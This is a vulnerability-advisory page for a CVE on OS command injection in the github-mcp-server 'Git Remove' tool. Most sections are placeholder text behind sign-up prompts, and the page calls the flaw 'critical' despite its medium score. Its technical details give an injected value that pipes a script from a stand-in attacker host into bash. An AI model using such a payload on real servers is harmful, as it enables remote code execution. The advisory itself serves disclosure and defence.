Sceawere

Vulnerability Detail

CVE-2026-102906UPDATED Verified Sceawere Triage Sources: NVD / CISA KEV

OS Command Injection in github-mcp-server

Vulnerability Metadata

Severity
Medium
Score / CVSS
6.3
Creation Date
4h ago
Vendor
0xshariq
Product
github-mcp-server
Attack Type
OS Command Injection
Vector String
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Attack Complexity
LOW

Narrative and Response

Description

A vulnerability was identified in 0xshariq github-mcp-server up to 52e764a7d66eac1726fce02ca7bb5a638571801a. This issue affects the function child_process.exec of the file src/github.ts of the component Git Remove MCP Tool. Such manipulation of the argument File leads to os command injection. The attack can be executed remotely. The exploit is publicly available and might be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet.

Executive Summary

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Executive Summary Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Technical Details

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Detailed Technical Analysis Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Mitigations

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Remediation & Mitigations Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

References

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Intelligence References Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Additional Metadata

{
  "score": "6.3",
  "pubDate": "2026-09-30T03:16:58.150Z",
  "pubdate": "2026-09-30T03:16:58.150Z",
  "executiveSummary": "A critical OS command injection vulnerability exists in the github-mcp-server project, specifically within the Git Remove MCP Tool functionality.\nThe vulnerability originates from the insecure handling of user-supplied input passed to the child_process.exec function in src/github.ts.\nAn unauthenticated, remote attacker can exploit this flaw to execute arbitrary system commands on the host environment with the privileges of the underlying process.\nThis represents a significant security risk, as successful exploitation facilitates remote code execution (RCE), potentially leading to complete system compromise, unauthorized data exfiltration, or lateral movement within the infrastructure.\nThe project utilizes a rolling release model, and no official security patches have been released or addressed by the maintainers as of the latest report.\nGiven that proof-of-concept exploit material is publicly available, this vulnerability should be treated as high-priority, and organizations utilizing this component should restrict access or deploy alternative mitigations immediately.",
  "technicalDetails": "The root cause of this vulnerability is the improper neutralization of special characters in the 'File' argument before passing it to the system shell via child_process.exec within src/github.ts.\nIn Node.js, child_process.exec spawns a shell (e.g., /bin/sh or cmd.exe) and executes the provided command string. Because the 'File' input is concatenated directly into the shell command string without validation or sanitization, the application is susceptible to shell meta-character injection.\nAn attacker can manipulate the 'File' argument by injecting command separators such as ';', '&&', or '||', followed by malicious system commands. When the application executes the resulting string, the shell interprets the injected commands as part of the execution flow.\nFor example, if the intended command is 'git rm [File]', an attacker providing an input such as 'file.txt; curl http://attacker.com/malicious_script | bash' causes the system to first attempt to remove 'file.txt' and subsequently execute the remote payload.\nThe attack flow follows a predictable sequence: First, the attacker identifies a reachable instance of the github-mcp-server. Second, the attacker crafts a malicious payload encapsulated within the 'File' parameter of the Git Remove MCP Tool's input interface. Third, the request is dispatched to the server, where the vulnerable src/github.ts component performs string concatenation without sanitization. Finally, the shell parses the tainted string and executes the attacker-supplied commands with the privileges assigned to the MCP server process.\nThe impact of successful exploitation includes full remote code execution, allowing the attacker to interact with the file system, terminate processes, or establish a reverse shell to gain persistent access. As the tool is designed for remote usage, the attack vector is exposed to any network environment where the MCP server is accessible. No specialized authentication is inherently required if the MCP endpoint is exposed without adequate access controls. This vulnerability persists across all deployments up to commit 52e764a7d66eac1726fce02ca7bb5a638571801a, as there is currently no formal release versioning to track remediated states."
}
CVE-2026-102906: OS Command Injection in github-mcp-server (MEDIUM Severity, CVSS: 6.3) | Sceawere